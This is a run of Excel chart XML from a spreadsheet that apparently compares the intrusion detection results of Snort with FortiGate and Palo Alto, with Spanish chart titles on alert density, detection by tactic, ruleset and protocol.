                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="1F1F1F"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>DENSIDAD DE ALERTAS POR TÁCTICA - Snort vs FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$499</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$500:$K$513</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$500:$L$513</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$M$499</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$500:$K$513</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$M$500:$M$513</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="728155903"/>
        <c:axId val="1877449971"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="728155903"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Táctica</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="1877449971"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1877449971"/>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728155903"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart11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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>EFECTIVIDAD DE ALERTAS POR TÁCTICA - Snort vs FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$517</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$518:$K$531</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$518:$L$531</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$M$517</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$518:$K$531</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$M$518:$M$531</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="88794287"/>
        <c:axId val="625984281"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="88794287"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Táctica</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="625984281"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="625984281"/>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88794287"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart11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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>PROCEDIMIENTOS DE IDENTIFICACIÓN - Snort vs FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$547</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$548:$K$552</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$548:$L$552</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$M$547</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$548:$K$552</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$M$548:$M$552</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1536138407"/>
        <c:axId val="1071097564"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1536138407"/>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1071097564"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1071097564"/>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536138407"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart114.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>DETECCIÓN EFICAZ - LV1 - Snort vs FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$M$571:$M$572</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="F1C232"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$573:$L$577</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$M$573:$M$577</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$N$571:$N$572</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$573:$L$577</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$N$573:$N$577</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="926037022"/>
        <c:axId val="1413786939"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="926037022"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>RuleSet</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="1413786939"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1413786939"/>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926037022"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart115.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>DETECCIÓN EFICAZ - LV2 - Snort vs FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$O$571:$O$572</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="F1C232"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$573:$L$577</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$O$573:$O$577</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$P$571:$P$572</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr>
                    <a:solidFill>
                      <a:srgbClr val="1F1F1F"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$573:$L$577</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$P$573:$P$577</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1281057720"/>
        <c:axId val="212635279"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1281057720"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>RuleSet</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="212635279"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="212635279"/>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281057720"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart116.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>DETECCIÓN EFICAZ DE ATAQUES POR PROTOCOLO - Snort vs FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$603</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$604:$K$622</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$604:$L$622</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$M$603</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$604:$K$622</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$M$604:$M$622</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="351401364"/>
        <c:axId val="454692345"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="351401364"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Protocolo</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="454692345"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="454692345"/>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351401364"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart117.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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% PROMEDIO DETECCIÓN EFICAZ FLUJOS - Snort vs PA</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="F1C232"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="2"/>
          </c:dPt>
          <c:dPt>
            <c:idx val="3"/>
          </c:dPt>
          <c:dPt>
            <c:idx val="4"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="3C78D8"/>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$V$235:$V$239</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$W$235:$W$239</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="705281583"/>
        <c:axId val="685683979"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="705281583"/>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685683979"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="685683979"/>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705281583"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart118.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% Promedio Detección Eficaz Flujos por Táctica - Snort vs PA</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$W$265</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$V$266:$V$279</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$W$266:$W$279</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
